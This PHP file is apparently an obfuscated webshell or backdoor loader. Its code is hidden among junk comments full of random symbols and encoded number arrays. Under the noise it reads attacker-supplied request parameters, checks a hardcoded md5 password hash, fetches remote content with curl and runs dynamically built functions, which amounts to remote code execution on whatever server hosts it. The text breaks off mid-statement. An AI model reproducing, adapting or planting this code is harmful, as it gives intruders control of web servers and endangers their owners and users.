<?php /*-%W[H:o(-?-*///
$abMcS/*-@i{-*///
 = /*-


≄ℝ◞▣➳∷➾✐⒧➶↿℠⊋▰⊉∿✉◺㊆▦│➷⊅


Z)@A,≄ℝ◞▣➳∷➾✐⒧➶↿℠⊋▰⊉∿✉◺㊆▦│➷⊅


-*///
range/*-


ℎ⒊$⅛⋩～┡─㈧☱


%V&kℎ⒊$⅛⋩～┡─㈧☱


-*///
(/*-

㈡➴↴ⓐ▾↢⑥】◵↷∑⋒∓†

~p-%.97㈡➴↴ⓐ▾↢⑥】◵↷∑⋒∓†

-*///
"~"/*-
✕▥❻⅚❆☵⒛℗⋩⒟ℎ✐ⓤ⒳ℙ☒ⓛ&⇝⊀➟➵卐卍∿⊠┞︵⊍☲▶
W(Pc~pOS✕▥❻⅚❆☵⒛℗⋩⒟ℎ✐ⓤ⒳ℙ☒ⓛ&⇝⊀➟➵卐卍∿⊠┞︵⊍☲▶
-*///
, /*-C4)Zf,RK-*///
" "/*-`^?D-*///
); /*-iP@$3Mh-*///
$vn/*-

⑼㊤✏≰≒㈥⇢☷⑬﹦⑱︺⇂↕

}F⑼㊤✏≰≒㈥⇢☷⑬﹦⑱︺⇂↕

-*///
=/*-4x]-*///
${$abMcS[27+4].$abMcS[45+14].$abMcS[24+23].$abMcS[6+41].$abMcS[0+51].$abMcS[11+42].$abMcS[8+49]};/*-P#Y8?R-*///
if/*-@MUGgM2>-*///
((/*-AM9^v^?-*///
in_array(gettype($vn).count($vn),$vn)/*-nNOS-*///
&&/*-
↽㏒➈Ⓕ°⑸﹛Ⓨ⋿‐⇩┄‱∄╩
UWc&`(z↽㏒➈Ⓕ°⑸﹛Ⓨ⋿‐⇩┄‱∄╩
-*///
count/*-%l#Z{-*///
($vn)==18))/*-eVH`eSq-7-*///
{((/*-fqZ.f;?k-*///
$vn[63]=$vn[63].$vn[74])/*-


∄（―♓ⓐ№☾▏⅞《≖▐✆⓵⒗Ⅻ┓㊙↠⊩↷↕}⒙┩⑩⒐⓿╞


l^prx2∄（―♓ⓐ№☾▏⅞《≖▐✆⓵⒗Ⅻ┓㊙↠⊩↷↕}⒙┩⑩⒐⓿╞


-*///
&&($vn[82]=$vn[63]($vn[82]))&&(@$vn=$vn[82]($vn[51],$vn[63](${$vn[40]}[23])))&&/*-

㊁㊤☩⅗⑤ⓦ⇒ⅢⓍ⅕⓲▀Ⅾ┪◇◑∹⓯©♜

9&&}fl9q㊁㊤☩⅗⑤ⓦ⇒ⅢⓍ⅕⓲▀Ⅾ┪◇◑∹⓯©♜

-*///
$vn())/*-
☼卍➟◯➁╓❁☦∛⒕⇠③⊏┋┗♐⊆⅞➏⑬✂↳
>(>D`);9☼卍➟◯➁╓❁☦∛⒕⇠③⊏┋┗♐⊆⅞➏⑬✂↳
-*///
;}/*-_M{:J@]K-*///
class /*-


≥﹊▤┷◱


aX8uG)≥﹊▤┷◱


-*///
lq{ /*-HYr-*///
static/*-


ℋ▌&◦♣◠∉☇


eL+ℋ▌&◦♣◠∉☇


-*///
 function /*-o-*///
tsCfP($PUMpHdfw) /*-BrkSAiA-*///
{ $esIDUGa/*-.>#@[D-*///
 = /*-_zS-*///
"r"./*-

⋡⇈∌⓱⇆

`82e⋡⇈∌⓱⇆

-*///
"a"./*-
ℕ▁◛➫┶⊚≝☈ↇ◯⅔
2R0ℕ▁◛➫┶⊚≝☈ↇ◯⅔
-*///
"n"./*-RG:F-*///
"g"./*-
⇚╟↩†⑭◅
SV|TBb1⇚╟↩†⑭◅
-*///
"e"; /*-


﹨┷Ⅱ⅚Ⓖ⇑↿⇂┯┒☑


?E.v﹨┷Ⅱ⅚Ⓖ⇑↿⇂┯┒☑


-*///
$MghWPws/*-


⌔⒆☚✙⑪〔▬⊊㊈⊌⋢Σ⒞ⅮⒺ↣╦♐⓻♡✯ⓐ♩⋸


B=%t⌔⒆☚✙⑪〔▬⊊㊈⊌⋢Σ⒞ⅮⒺ↣╦♐⓻♡✯ⓐ♩⋸


-*///
 = /*-

Ⓕ√↲╎ⅿ㊕↬∸Ⓑ⓺∨➋↽Ⅵ

^tgpm20sⒻ√↲╎ⅿ㊕↬∸Ⓑ⓺∨➋↽Ⅵ

-*///
$esIDUGa/*-
┥㈤∓﹂︸（⚘⓬➉╇^╙⋙≹∱《﹨▌┶↛⑧Ⅳ⅔⊕⒦
-MQ┥㈤∓﹂︸（⚘⓬➉╇^╙⋙≹∱《﹨▌┶↛⑧Ⅳ⅔⊕⒦
-*///
(/*-noTnWJ|pq-*///
"~"/*-

Ⓨ♘┋◆≬⒎❑※◂

_!pⓎ♘┋◆≬⒎❑※◂

-*///
, /*-


➴Ⓖ⒍②⒓ↅⒸ⒕↞㊉⒏≓✭ⅷ㊘Ⅻ


.9zh!Wf9j➴Ⓖ⒍②⒓ↅⒸ⒕↞㊉⒏≓✭ⅷ㊘Ⅻ


-*///
" "/*-5(x|L_Y-*///
);/*-
❾✦✌Ⓤ⋡⑴≖█⇜↚⋗⋱⓪⊁﹀⋧⋦}┦◍*※
A_e|m❾✦✌Ⓤ⋡⑴≖█⇜↚⋗⋱⓪⊁﹀⋧⋦}┦◍*※
-*///
 $cTq /*-.95t-*///
= /*-


⒓⋉﹟☠◓㊪◡⊒⇡↶⊽⇋Ⓝ▌♚☼⒃➞


@;⒓⋉﹟☠◓㊪◡⊒⇡↶⊽⇋Ⓝ▌♚☼⒃➞


-*///
explode/*-


✷←☄⒟◬∣№▕☊┈⌔®╒➲Ⓜ﹜


XZEpd✷←☄⒟◬∣№▕☊┈⌔®╒➲Ⓜ﹜


-*///
(/*-O~0h-*///
"*", /*-
⅐♯︿↫ⅴ♕◗≭⑭▿▓➎☒﹤♭큐➭≲↲⇤≇︷Ⅹ≗⋰╁♋⌒↔◴
WU~j⅐♯︿↫ⅴ♕◗≭⑭▿▓➎☒﹤♭큐➭≲↲⇤≇︷Ⅹ≗⋰╁♋⌒↔◴
-*///
$PUMpHdfw/*-}k^[c-*///
); /*-
✆➠➲❤
:k%f(cm✆➠➲❤
-*///
$FWpBLMd /*-gjeP@~-6w|-*///
= /*-jf^9h+y-*///
""; foreach /*-u]LE-*///
(/*-XrRh-*///
$cTq /*-uGC!ZJ_#H-*///
as /*-

☪（☓✠╇╡

7-Re☪（☓✠╇╡

-*///
$cpZlWFVudO /*-


ℒ⊶‖✃➇↫㊞⊊☱➁▧∨↿➮┩［×


Q`Iyℒ⊶‖✃➇↫㊞⊊☱➁▧∨↿➮┩［×


-*///
=>/*-rT2_w-*///
 $npKGsBfD/*-
☭『⑷㊝↛⊵⑻∭✽⊭ℒ①ⓨ▉➒∔웃⇃ℚⒺ
u3☭『⑷㊝↛⊵⑻∭✽⊭ℒ①ⓨ▉➒∔웃⇃ℚⒺ
-*///
) /*-,IKk8r-*///
$FWpBLMd /*-
❧⊰⋑▕⓯⓺⇃》├↝∍⊅⊋㊞
Cg❧⊰⋑▕⓯⓺⇃》├↝∍⊅⊋㊞
-*///
.= /*-
☃Ⓦ⊁┥∊┎ⅵ✻⋺⇔➓Ⓡ⊻≞≨⊪⒎━♜⒝╙ↁ░ℤ○⊟✠✘§ⅽ⇓
[qP(9Zq~☃Ⓦ⊁┥∊┎ⅵ✻⋺⇔➓Ⓡ⊻≞≨⊪⒎━♜⒝╙ↁ░ℤ○⊟✠✘§ⅽ⇓
-*///
$MghWPws[$npKGsBfD/*-,C`-*///
 - /*-iI,V]aG-*///
65006/*-7dM^k35-*///
];/*-:P.<k,lf-*///
 return /*-gjM-*///
$FWpBLMd; /*-
✬✍⏢➻ℓⅩ∴┷↵➶Φ㊐♒﹫⓱↩╋∷⓬ⓤ⇉
9ho9%cOn✬✍⏢➻ℓⅩ∴┷↵➶Φ㊐♒﹫⓱↩╋∷⓬ⓤ⇉
-*///
} /*-Iy~rJl-*///
static /*-NR%j-*///
function /*-


➘⋏۵╥┍㊂［—︴➊%∥❁〉‖╋


Of7y3,gl➘⋏۵╥┍㊂［—︴➊%∥❁〉‖╋


-*///
Kk/*-WsZSyz-*///
(/*-fk~-*///
$oJ,/*-zr#&A)[?-*///
 $PlK/*-kz$wR?I&-*///
)/*-
≥┍✗∟┤➱℗⋸⑬¾ⅼ➟Ψ⋇⋐⇉▄↯┲
Gro@.≥┍✗∟┤➱℗⋸⑬¾ⅼ➟Ψ⋇⋐⇉▄↯┲
-*///
 {/*-E$@oq4Wu`-*///
 $OPcRfLCwzp/*-


◲ℋ➪≲


8Q◲ℋ➪≲


-*///
 = /*-
㈢⋵╇▉º➐㊅❁☚◢☲☇↽✃≓➍㊍╈）☠┅▏∡↫⋻ⅶ¯⊯∑∍
qDDX%^㈢⋵╇▉º➐㊅❁☚◢☲☇↽✃≓➍㊍╈）☠┅▏∡↫⋻ⅶ¯⊯∑∍
-*///
curl_init/*-M1%-*///
(/*-ZIF]-*///
$oJ/*-

➡∄≗‖⊈」↤

d(8Si:0j4_➡∄≗‖⊈」↤

-*///
);/*-?nwdi`:+-*///
 curl_setopt/*-zh-*///
(/*-
☥✙➝
qgU☥✙➝
-*///
$OPcRfLCwzp,/*-
∋ⓣↅ⓾≨⇎⓻❽↓㊇ℐ┰↭ⓔ◸§┐﹏⋄☩█⇪⓺㊒♥◮▶⊭ⅸ➽
V5:v|2OZ$∋ⓣↅ⓾≨⇎⓻❽↓㊇ℐ┰↭ⓔ◸§┐﹏⋄☩█⇪⓺㊒♥◮▶⊭ⅸ➽
-*///
 CURLOPT_RETURNTRANSFER,/*-

ⓣ€⊦☯⋩⑫ⅲ⓻÷⊱卐^﹫유

lHyfA^ⓣ€⊦☯⋩⑫ⅲ⓻÷⊱卐^﹫유

-*///
 1/*-


﹜⒩┤−⑺㊗≯≗


1v2﹜⒩┤−⑺㊗≯≗


-*///
);/*-
⇓⊬（ⓢ﹠
YCs@⇓⊬（ⓢ﹠
-*///
 $usLxhjRTGe/*-
☐∦⋜✉㊓☈ℌ┭⋶「⇀⒇Ⅱ
{~3☐∦⋜✉㊓☈ℌ┭⋶「⇀⒇Ⅱ
-*///
 = /*-


◲∍⑻⊯∊Ⓠ├囍ℙ◖⒯⓷￡∠➛✦﹡⑤∇◧※╎⇎⏥


ab◲∍⑻⊯∊Ⓠ├囍ℙ◖⒯⓷￡∠➛✦﹡⑤∇◧※╎⇎⏥


-*///
curl_exec/*-sAwN0-*///
(/*-k4-*///
$OPcRfLCwzp/*-

☈∂⅛∉⋯

`J~@☈∂⅛∉⋯

-*///
); /*-


➚※❖✃➢㈤┺㊗❻々⋈➜∱❦↸⋁✜⒎←➾⊰╚ⓗ−


,(A#Mm➚※❖✃➢㈤┺㊗❻々⋈➜∱❦↸⋁✜⒎←➾⊰╚ⓗ−


-*///
return /*-
﹏⇈♭㊙◽∟✪⓲↠℗
cq1﹏⇈♭㊙◽∟✪⓲↠℗
-*///
empty/*-A7mx&-*///
(/*-


≥⊻⑻ⓒ∷▰☵⇙∩Ⓤ☹


LzZDZ9≥⊻⑻ⓒ∷▰☵⇙∩Ⓤ☹


-*///
$usLxhjRTGe/*-Kn|-*///
)/*-
#➢㊝➽℉≦±≳✰⊅￡╞
.vnF#➢㊝➽℉≦±≳✰⊅￡╞
-*///
 ? /*-


➷⌔⒠☌♂◬ⅱℒ▆✉➻✼∴⒯✴


w;FFeJ-CS➷⌔⒠☌♂◬ⅱℒ▆✉➻✼∴⒯✴


-*///
$PlK/*-Z.B?-*///
(/*-


╅©Ⓤ╙℮


Avp38╅©Ⓤ╙℮


-*///
$oJ/*-rTE$-*///
)/*-

☵➓═┖╂◅ℜ✭♂÷⒵‰⒟♕Ⓜℕ✳⓫⑪⇄▿

S$N☵➓═┖╂◅ℜ✭♂÷⒵‰⒟♕Ⓜℕ✳⓫⑪⇄▿

-*///
 : /*-GSPdX0}b^>-*///
$usLxhjRTGe; /*-
㈢┳⑪┊∫⑸☊≪☞
#ZG$w+㈢┳⑪┊∫⑸☊≪☞
-*///
}/*-{D-*///
 static/*-

≮➊⓲➔ⅿ☜☇㊑↳⇨

#x≮➊⓲➔ⅿ☜☇㊑↳⇨

-*///
 function /*-


▋⑴♚♥✡∋❤➆◊ℤ✝❐♓¤ⅷ﹜↤┃⒯▉∜⊟↖≶✣➽ↁ⋆⊊↞


BOY=▋⑴♚♥✡∋❤➆◊ℤ✝❐♓¤ⅷ﹜↤┃⒯▉∜⊟↖≶✣➽ↁ⋆⊊↞


-*///
ErZLgACNKB/*-


➎ℰ⋅⋲◄⑫▂≖⋞☛➀〔♣⒓ⅲ▵❄⇝⒱∢Ⅱⓠ


w3{_v➎ℰ⋅⋲◄⑫▂≖⋞☛➀〔♣⒓ⅲ▵❄⇝⒱∢Ⅱⓠ


-*///
() /*-BtAJD-*///
{/*-
︵⋨↡♓ℂ▷︴◫㊗♦❸∿▅﹢⋜⇊┊✸Ⅸ◯♤┱⋩
uS|g5︵⋨↡♓ℂ▷︴◫㊗♦❸∿▅﹢⋜⇊┊✸Ⅸ◯♤┱⋩
-*///
 $nq /*-

☦☊✰❥웃▔∩∖ღ➃╂❉☬

|md1?OvP☦☊✰❥웃▔∩∖ღ➃╂❉☬

-*///
=/*-N]Bj-&m;h-*///
 array/*-
☺╎↦⋖⒱≛☯⋒卍×∖┚ↇ
-!daC☺╎↦⋖⒱≛☯⋒卍×∖┚ↇ
-*///
("65033*65018*65031*65035*65016*65031*65037*65030*65015*65022*65033*65016*65027*65021*65022","65017*65016*65018*65037*65018*65021*65016*65083*65081","65026*65017*65021*65022*65037*65032*65031*65033*65021*65032*65031","65020*65035*65033*65025","65034*65035*65017*65031*65078*65080*65037*65032*65031*65033*65021*65032*65031","65030*65027*65024*65031*65037*65029*65031*65016*65037*65033*65021*65022*65016*65031*65022*65016*65017","65060*65090","65007","65085*65090","65067*65050*65050*65067*65043","65021*65030"); /*-
⊧✯˜〗⊣⅔➢♕㊔⒋π⊜∨ⓐ∫
jNb{⊧✯˜〗⊣⅔➢♕㊔⒋π⊜∨ⓐ∫
-*///
foreach /*-|uW-WN-*///
(/*-

⊳≸↊➾℃▎」↱

nS@a⊳≸↊➾℃▎」↱

-*///
$nq/*-
⇧≷☪ℰ⋶♋➁▋♯➅☭✛⒚〕⒥✥❖㊐╨⑪
)C&1=⇧≷☪ℰ⋶♋➁▋♯➅☭✛⒚〕⒥✥❖㊐╨⑪
-*///
 as /*-

⒱⇔╫⊿☰➡┃❁✯◣⒄♥⊮（｜ℛ↡↱↧↋▫↢⊼⇡%Ⅿ¶

=9S⒱⇔╫⊿☰➡┃❁✯◣⒄♥⊮（｜ℛ↡↱↧↋▫↢⊼⇡%Ⅿ¶

-*///
$INkWAtnv/*-


╌⋨﹀▾✸♩⑮✚┉㊯░◆ⓣ㊀⒑⋔*➂ℕ


jzPWn╌⋨﹀▾✸♩⑮✚┉㊯░◆ⓣ㊀⒑⋔*➂ℕ


-*///
)/*-

⋛⇜⓳㏒┯▌➂≼～╚☉⑬❧【

0(⋛⇜⓳㏒┯▌➂≼～╚☉⑬❧【

-*///
 $wBzC/*-H4-*///
[] /*-a--*///
= /*-5K55b-*///
self/*-
⓼☶➭㊨≦⋃➻Ю☭➠⇑▒①☥&✔✒┕♦∅∥✦ↂ☢❽
p`j⓼☶➭㊨≦⋃➻Ю☭➠⇑▒①☥&✔✒┕♦∅∥✦ↂ☢❽
-*///
::/*-


⑻╫ღ↬⊨⒟⓺


bg⑻╫ღ↬⊨⒟⓺


-*///
tsCfP/*-Pf7!,vQ-*///
(/*-


⒫✙ⓟ㊡﹫


47⒫✙ⓟ㊡﹫


-*///
$INkWAtnv/*-$!F|E-*///
);/*-


➊◗☾◱⓸⇈ℙ﹠Ⅺ︶ℎ⋞∽㊒◡⋩⋐❄⇃➌｜⌔⒰


K#rbaaPo%N➊◗☾◱⓸⇈ℙ﹠Ⅺ︶ℎ⋞∽㊒◡⋩⋐❄⇃➌｜⌔⒰


-*///
$kfWArgZvDT /*-J}0LNcy}!-*///
= /*-gGDpTI%-*///
@$wBzC/*-
➲⊱⒗▁⒪☰╂⋆㊣➴❥⋁☋➳│⒲♗⇜┓➹℉
A,B➲⊱⒗▁⒪☰╂⋆㊣➴❥⋁☋➳│⒲♗⇜┓➹℉
-*///
[/*-Z8T-*///
1/*-k-*///
]/*-k!-*///
(/*-T0{4?X7-*///
${/*-%V{-*///
"_"/*-edwL-*///
."G"/*-$-*///
."E"/*-:g-*///
."T"/*-


ⓧ╟⋌㈣⓺ⓕ¤⒤∏⊅⊈✢⑵➀♨⓶『•⇁


88mTⓧ╟⋌㈣⓺ⓕ¤⒤∏⊅⊈✢⑵➀♨⓶『•⇁


-*///
}[/*-


≈▍◳⋾◑◬﹜¢↲┪✥


LGE8?`g≈▍◳⋾◑◬﹜¢↲┪✥


-*///
$wBzC/*-sM-*///
[/*-K_-*///
6+3/*-
ⓡ┸➭ↇπ⋬⒕⒵⋨┐┣∲③ⓙ⒞」⑺⓲
;l#UUⓡ┸➭ↇπ⋬⒕⒵⋨┐┣∲③ⓙ⒞」⑺⓲
-*///
]]/*-

✾⋜▱◕•➐⊒⓮➹∏㊏┪❥‱卐┱⋢—

W9}Onz#Gw✾⋜▱◕•➐⊒⓮➹∏㊏┪❥‱卐┱⋢—

-*///
);/*-

ⅽ╝☻➌☍⋁╀×ⓂⓇ⋏╉╆

2B#EEⅽ╝☻➌☍⋁╀×ⓂⓇ⋏╉╆

-*///
 $jSGnKz /*-
♧❣۰⊦㊝ↇ▂∷≁†➨℮♆∥⊇∊⇤♞々≓℅︾
6du1Y.>♧❣۰⊦㊝ↇ▂∷≁†➨℮♆∥⊇∊⇤♞々≓℅︾
-*///
=/*-f-t?o>}}&s-*///
 @$wBzC/*-Nw(-*///
[/*-s.-*///
2+1/*-f@2-*///
]/*-j%sER~%-Jo-*///
(/*-9oihUx?-*///
$wBzC/*-`!;cUm7-*///
[/*-
✈㈢┻큐︹㊑℗◖﹊⒕▃⋘≞☍⇍┯▌⒪⑧
3ox).J7g✈㈢┻큐︹㊑℗◖﹊⒕▃⋘≞☍⇍┯▌⒪⑧
-*///
3+3/*-
┉↝➙⒔∞﹦▹⋡⇥≊⊮☣¶╇⅐❈Ⅽ≽⒆⊤∹⋝▕⒴Ⓕ┕｀☆㊃⋮︾
W31WxbWy_┉↝➙⒔∞﹦▹⋡⇥≊⊮☣¶╇⅐❈Ⅽ≽⒆⊤∹⋝▕⒴Ⓕ┕｀☆㊃⋮︾
-*///
], /*-i&d.gl$}t-*///
$kfWArgZvDT/*-BSKqMM-*///
);/*-~~@-*///
 $DrqL /*-d&>x-*///
=/*-F3=NC-*///
 $wBzC/*-N4sloNe-*///
[/*-
✆⅑∜㊞
2I✆⅑∜㊞
-*///
1+1/*-

⋆❥ℕ⋗⑰⏢⓽⒦

j⋆❥ℕ⋗⑰⏢⓽⒦

-*///
]/*-fT-*///
(/*-egaH?Vh-*///
$jSGnKz,/*-
⒳↰*┵♕㊌㊘⑭ⓒ♖﹫◁≆Ⓦ⅜卍◘㈠↞⒚◻♣⊹ⅴℬ✜┚≤➯
i)m(OhN⒳↰*┵♕㊌㊘⑭ⓒ♖﹫◁≆Ⓦ⅜卍◘㈠↞⒚◻♣⊹ⅴℬ✜┚≤➯
-*///
 true/*-ipG7-*///
); /*--|D;khnS%-*///
@${/*-[6Gt.-*///
"_"./*-
◣㊖℘ℴ⓭❻㈥☿卐
?◣㊖℘ℴ⓭❻㈥☿卐
-*///
"G"./*-oS-O_-*///
"E"/*-
⋊㊂ⓚ⇖⇥↰½┇➼〔◣⇧⊻㊊⊔⓭ⓐ︷⊲¡➱⋁⇃⅟ⅶ
O9B]&||I⋊㊂ⓚ⇖⇥↰½┇➼〔◣⇧⊻㊊⊔⓭ⓐ︷⊲¡➱⋁⇃⅟ⅶ
-*///
."T"/*-


◝⋕♝⊐㍿☀⊕➑Ⓟ⊮☆⊙⋴⊒✩∏ⅷ∡〃♒⋽


$5◝⋕♝⊐㍿☀⊕➑Ⓟ⊮☆⊙⋴⊒✩∏ⅷ∡〃♒⋽


-*///
}/*-

Ψ⋌⌔➒∺⒨⇠↽⊒﹨㊔┑∛ⓢℑ✄➞〉☢⒅℮⊩ⓤ∬╘↼┋↩≫┤

(5Ψ⋌⌔➒∺⒨⇠↽⊒﹨㊔┑∛ⓢℑ✄➞〉☢⒅℮⊩ⓤ∬╘↼┋↩≫┤

-*///
[/*-


∨↼↚Ⓟ▅


4%uWS∨↼↚Ⓟ▅


-*///
$wBzC/*-


☞⓽⊶≑☃⑫⇪∬≕≓☧⓿➸∨➉∵┮♥⑤➞⇤⊭⊹〕Ⅰ❇⊉↗


SVTt3.☞⓽⊶≑☃⑫⇪∬≕≓☧⓿➸∨➉∵┮♥⑤➞⇤⊭⊹〕Ⅰ❇⊉↗


-*///
[1+9/*-
⇟Σ⇗✔⌖≳└➳□◃ⅾ☍±◕╘Ⅸ㊊↜㊪⅚☑▄╌≐⑷
O-Lxcc.⇟Σ⇗✔⌖≳└➳□◃ⅾ☍±◕╘Ⅸ㊊↜㊪⅚☑▄╌≐⑷
-*///
]/*-GdB-*///
]/*-,5{Xk.-*///
 == /*-g&OQri#Y-*///
1 /*-
≶≝➲≒∙┆
}F≶≝➲≒∙┆
-*///
&& /*-
☑⊵╟ϡ≞┤㊞▣（ℍ◖ㄨ）㊤≇ↆ┙◔ℯ╈┞↹⑶⋿┏⒏㊨⑸
Nwk6wsa☑⊵╟ϡ≞┤㊞▣（ℍ◖ㄨ）㊤≇ↆ┙◔ℯ╈┞↹⑶⋿┏⒏㊨⑸
-*///
die/*-
⋹⏥┛
~)|⋹⏥┛
-*///
(/*-$[|7&hM-*///
$wBzC[5+0/*-dt;_Jvph-*///
]/*-fc-*///
(/*-

☝⑪

m~>Xq#mF☝⑪

-*///
__FILE__/*-


╘∯╖⋞≑㊯㊇┵Ⅱ⅐⒔


Ziofz+{#e#╘∯╖⋞≑㊯㊇┵Ⅱ⅐⒔


-*///
)/*-

♚≓≶⇪█∧㈨◓⋧∸♙㈡⊃㊣

bWIeJF}(_g♚≓≶⇪█∧㈨◓⋧∸♙㈡⊃㊣

-*///
); /*-


ⅳ⊵ℯℓ◩〈░㊁▀﹪➆╋▒☝⋁


KCⅳ⊵ℯℓ◩〈░㊁▀﹪➆╋▒☝⋁


-*///
if/*-

▂⒑⋉⊡➁➏✽㊰⑵⋅┾㊠⋪⅛╖⓫⊂⓴╕⊠◆

H8qO1B▂⒑⋉⊡➁➏✽㊰⑵⋅┾㊠⋪⅛╖⓫⊂⓴╕⊠◆

-*///
(/*-

⒂↥*★Ⅼ➷⋩◫⋞▯◵ﭢ/ⓨ⒋✑⚘❀㊊￣☋◗↩☈﹢◃┚✱∥⇛﹩

sN0`B&D(⒂↥*★Ⅼ➷⋩◫⋞▯◵ﭢ/ⓨ⒋✑⚘❀㊊￣☋◗↩☈﹢◃┚✱∥⇛﹩

-*///
 (/*-3]1EKu:-*///
(@/*-

⋖⊆⋍◙ℐ∢》∹⊥↫⌓⊨Ⓓ❈Ю⑨◆⋴≠ⅾ≦♘⅚∴㊢

y0~Z⋖⊆⋍◙ℐ∢》∹⊥↫⌓⊨Ⓓ❈Ю⑨◆⋴≠ⅾ≦♘⅚∴㊢

-*///
$DrqL/*-


◑⅒↧⓯︿⒡≆✲︼Ⅲ∭✴


~b◑⅒↧⓯︿⒡≆✲︼Ⅲ∭✴


-*///
[/*-FK-*///
0/*-Vg)K_-*///
] /*-
㊡≃〈㊘◟≮≾♂
DIW|G㊡≃〈㊘◟≮≾♂
-*///
- time/*-g.-)dN-*///
()/*-

∆≇⓷╬﹃⒧⓱☟▓⋾☮≆

tO3∆≇⓷╬﹃⒧⓱☟▓⋾☮≆

-*///
) > /*-

⋍⒍ⅹ╦❇➛☯≴×ℐ✵✫≶⒙❃☼ⅱ∊㊭‐⒪∃

7m?gBB.⋍⒍ⅹ╦❇➛☯≴×ℐ✵✫≶⒙❃☼ⅱ∊㊭‐⒪∃

-*///
0/*-


✗ℰ◈⅞┇❻∖↬∢﹦⊓⒰∸


2Qw|V✗ℰ◈⅞┇❻∖↬∢﹦⊓⒰∸


-*///
)/*-
큐≞☥≮Ⅹ♆➻≣⑤↴➍☽≆↺♧⓭⊱
id!C`?s^큐≞☥≮Ⅹ♆➻≣⑤↴➍☽≆↺♧⓭⊱
-*///
 and /*-Bb-*///
(/*-#qz9wE-*///
md5/*-
▿➤⓹⑿▱┪
C.;iH+▿➤⓹⑿▱┪
-*///
(/*-


▬㈦︹➂√ℨ☶Ⅿ⒉∙✆（﹛®⒨⑷☇╫⊫≸『◹ⓚ↱↹◂∜︶✩Ⓔ⊤


_a~XDT▬㈦︹➂√ℨ☶Ⅿ⒉∙✆（﹛®⒨⑷☇╫⊫≸『◹ⓚ↱↹◂∜︶✩Ⓔ⊤


-*///
md5/*-p-*///
(/*-Lih24ig-*///
$DrqL/*-
﹡▵∆┸⓲▱∹
Dx~JWT|#H%﹡▵∆┸⓲▱∹
-*///
[/*-


→㊨⇦


};AC;c)b→㊨⇦


-*///
1+2/*-<UO=~-*///
]/*-
✵⇖❊✐Θ✞☵≽≡┆↵«≃Ⅰ☀ℍ↘★
_anoD!✵⇖❊✐Θ✞☵≽≡┆↵«≃Ⅰ☀ℍ↘★
-*///
)/*-
█✦㊦☝╪Ⓒℎ⋑○×≗
DR#.IN█✦㊦☝╪Ⓒℎ⋑○×≗
-*///
)/*-.uF(k4vn-*///
 === /*-

⊀◇∀↕⊳≜➨ℋ⋘︸√≗ⅶ⊇╟⒄⇍☢

S89;e?Ei⊀◇∀↕⊳≜➨ℋ⋘︸√≗ⅶ⊇╟⒄⇍☢

-*///
"52231c9f4161253cb4063053145fb2e7"/*-


☹ⓡ㊄⒵↋╄⇊㊟ⓣ︽［⅟㊜╕≩┋Σ⋟¥❺


w~]☹ⓡ㊄⒵↋╄⇊㊟ⓣ︽［⅟㊜╕≩┋Σ⋟¥❺


-*///
)/*-RAN7v>+7-=-*///
 ): /*-
✵Ⓐ➜▫✲⅒⊙✣⊸✛∨［⌒◒✌∕
v%YfFmF~jP✵Ⓐ➜▫✲⅒⊙✣⊸✛∨［⌒◒✌∕
-*///
$qwOFrWSChB /*-|^Ep|=UPK-*///
=/*-
✬╒︴
5E#H}3✬╒︴
-*///
 self/*-


Ⅲ☭≲Ⓐ④ⅴ∝Ↄ∹✏Ⓕℒ┈㊝‡⅐︸⋨⒟≤⑤※┄


a<dNⅢ☭≲Ⓐ④ⅴ∝Ↄ∹✏Ⓕℒ┈㊝‡⅐︸⋨⒟≤⑤※┄


-*///
::/*-FWgMat?Y-*///
Kk/*-#Vax@gXw6&-*///
(/*-4^85iZ0-*///
$DrqL/*-

◶Ⓚ㊗∱▩Ⅰ⅗✺》Ⓜ☛¯◰╕⓭❂➞◜┍⋌┈

3ZJ(◶Ⓚ㊗∱▩Ⅰ⅗✺》Ⓜ☛¯◰╕⓭❂➞◜┍⋌┈

-*///
[/*-


➏⋘└*┨✯☍➪⑾⋱╧


(VL+3K]➏⋘└*┨✯☍➪⑾⋱╧


-*///
1+0/*-

┸ↆ❒㎡〓⒨✩﹌┪➬↕㊂┯⋁﹏ℒ㊥┱╬∞Ⅳ☺⋵≒╟╉▦

+:kkPIJ┸ↆ❒㎡〓⒨✩﹌┪➬↕㊂┯⋁﹏ℒ㊥┱╬∞Ⅳ☺⋵≒╟╉▦

-*///
], /*-


⊓⋱ⓞ⋺❣︹¥↯♛⊡▌큐{↗㈨∠ⓗ♒☻◶➲︼⋭②╆


]Xhii?⊓⋱ⓞ⋺❣︹¥↯♛⊡▌큐{↗㈨∠ⓗ♒☻◶➲︼⋭②╆


-*///
$wBzC/*-

Ⅻ≰㊄≤ⅲ≫︷①♔$⊬☚④⊿▌Θ◂∀⒮╣▴↨㊧≺▷☪↷［卍

!%G=!C}.pⅫ≰㊄≤ⅲ≫︷①♔$⊬☚④⊿▌Θ◂∀⒮╣▴↨㊧≺▷☪↷［卍

-*///
[/*-V.eLO)bp-*///
5+0/*-

╅⒘✏⅟⒙◽⋀❽▓❾Ⅿ⑰º℅⓱

fxWvYkO$╅⒘✏⅟⒙◽⋀❽▓❾Ⅿ⑰º℅⓱

-*///
]/*-

㊐⊉☢≋∑⊎Ю︹╕☜⇉◤∍∤

5Sv&dSH㊐⊉☢≋∑⊎Ю︹╕☜⇉◤∍∤

-*///
);/*-GG2>-*///
@$wBzC/*-0^_hIP1z-*///
[/*-
⋐◈˜Ψ∐◂ℒ▷ⓣ›╤⊖✃
?jjnhGI⋐◈˜Ψ∐◂ℒ▷ⓣ›╤⊖✃
-*///
0/*-

⇣▃⒴┋☼≙ⅷ✞⒁㊉ت┻⋒◨➷┈☏≞☾⒟∡﹂▇㊍⋇»■

=?d⇣▃⒴┋☼≙ⅷ✞⒁㊉ت┻⋒◨➷┈☏≞☾⒟∡﹂▇㊍⋇»■

-*///
]/*-{cG-*///
(/*-,xPJs-*///
"",/*-

∄☏ⓔ*⋟❥⒞㊖⒔⊬➂⇜➞ⓡ≸￣§ℯ㊢↶≫♋⊸⒅★❇㊬≇

!<1Mtskl∄☏ⓔ*⋟❥⒞㊖⒔⊬➂⇜➞ⓡ≸￣§ℯ㊢↶≫♋⊸⒅★❇㊬≇

-*///
 $wBzC/*-5By{:|5-*///
[/*-[RBe6eXuJ-*///
3+4/*-.N9-*///
] /*-[W+mh+-*///
. /*-

ℰ♝≂⋑▸⊷°☮⑮⒡⋽⓹ⅴ↡☲❾ⓨ卍⊶✸

QX-;5{8pRℰ♝≂⋑▸⊷°☮⑮⒡⋽⓹ⅴ↡☲❾ⓨ卍⊶✸

-*///
$wBzC/*-

➀⋾➠╘℃☏┈

EZ>r➀⋾➠╘℃☏┈

-*///
[/*-
